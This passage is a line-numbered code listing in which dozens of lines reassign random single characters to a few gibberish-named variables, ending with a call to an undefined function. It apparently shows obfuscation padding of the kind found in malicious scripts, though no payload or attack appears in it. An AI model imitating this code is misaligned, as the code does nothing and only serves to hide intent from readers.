1604 | xbtgyrs = "z"; | |
1605 | xbtgyrs = "T"; | |
1606 | xbtgyrs = "n"; | |
1607 | xbtgyrs = "z"; | |
1608 | xbtgyrs = "p"; | |
1609 | xbtgyrs = "v"; | |
1610 | xbtgyrs = "M"; | |
1611 | xbtgyrs = "X"; | |
1612 | xbtgyrs = "S"; | |
1613 | xbtgyrs = "h"; | |
1614 | iqufexvn = "a"; | |
1615 | iqufexvn = "Z"; | |
1616 | iqufexvn = "e"; | |
1617 | iqufexvn = "g"; | |
1618 | iqufexvn = "X"; | |
1619 | iqufexvn = "T"; | |
1620 | iqufexvn = "g"; | |
1621 | iqufexvn = "a"; | |
1622 | iqufexvn = "p"; | |
1623 | iqufexvn = "Z"; | |
1624 | iqufexvn = "v"; | |
1625 | iqufexvn = "I"; | |
1626 | iqufexvn = "u"; | |
1627 | iqufexvn = "U"; | |
1628 | iqufexvn = "G"; | |
1629 | iqufexvn = "7"; | |
1630 | mwpqfcbr = "U"; | |
1631 | mwpqfcbr = "c"; | |
1632 | mwpqfcbr = "b"; | |
1633 | mwpqfcbr = "t"; | |
1634 | mwpqfcbr = "J"; | |
1635 | mwpqfcbr = "a"; | |
1636 | mwpqfcbr = "R"; | |
1637 | mwpqfcbr = "p"; | |
1638 | mwpqfcbr = "Q"; | |
1639 | mwpqfcbr = "y"; | |
1640 | mwpqfcbr = "R"; | |
1641 | mwpqfcbr = "Q"; | |
1642 | mwpqfcbr = "g"; | |
1643 | mwpqfcbr = "J"; | |
1644 | mwpqfcbr = "o"; | |
1645 | mwpqfcbr = "g"; | |
1646 | mwpqfcbr = "Y"; | |
1647 | mwpqfcbr = "x"; | |
1648 | mwpqfcbr = "a"; | |
1649 | mwpqfcbr = "l"; | |
1650 | mwpqfcbr = "L"; | |
1651 | mwpqfcbr = "U"; | |
1652 | mwpqfcbr = "s"; | |
1653 | mwpqfcbr = "K"; | |
1654 | mwpqfcbr = "k"; | |
1655 | mwpqfcbr = "C"; | |
1656 | mwpqfcbr = "d"; | |
1657 | mwpqfcbr = "A"; | |
1658 | mwpqfcbr = "d"; | |
1659 | mwpqfcbr = "A"; | |
1660 | mwpqfcbr = "o"; | |
1661 | mwpqfcbr = "P"; | |
1662 | mwpqfcbr = "N"; | |
1663 | mwpqfcbr = "u"; | |
1664 | mwpqfcbr = "V"; | |
1665 | mwpqfcbr = "k"; | |
1666 | mwpqfcbr = "l"; | |
1667 | mwpqfcbr = "Z"; | |
1668 | mwpqfcbr = "H"; | |
1669 | mwpqfcbr = "t"; | |
1670 | mwpqfcbr = "S"; | |
1671 | mwpqfcbr = "X"; | |
1672 | mwpqfcbr = "M"; | |
1673 | mwpqfcbr = "Q"; | |
1674 | mwpqfcbr = "6"; | |
1675 | gfmjwnz = "z"; | |
1676 | gfmjwnz = "G"; | |
1677 | gfmjwnz = "G"; | |
1678 | gfmjwnz = "w"; | |
1679 | gfmjwnz = "T"; | |
1680 | gfmjwnz = "I"; | |
1681 | gfmjwnz = "Q"; | |
1682 | gfmjwnz = "t"; | |
1683 | sonbcwj ( ); |
|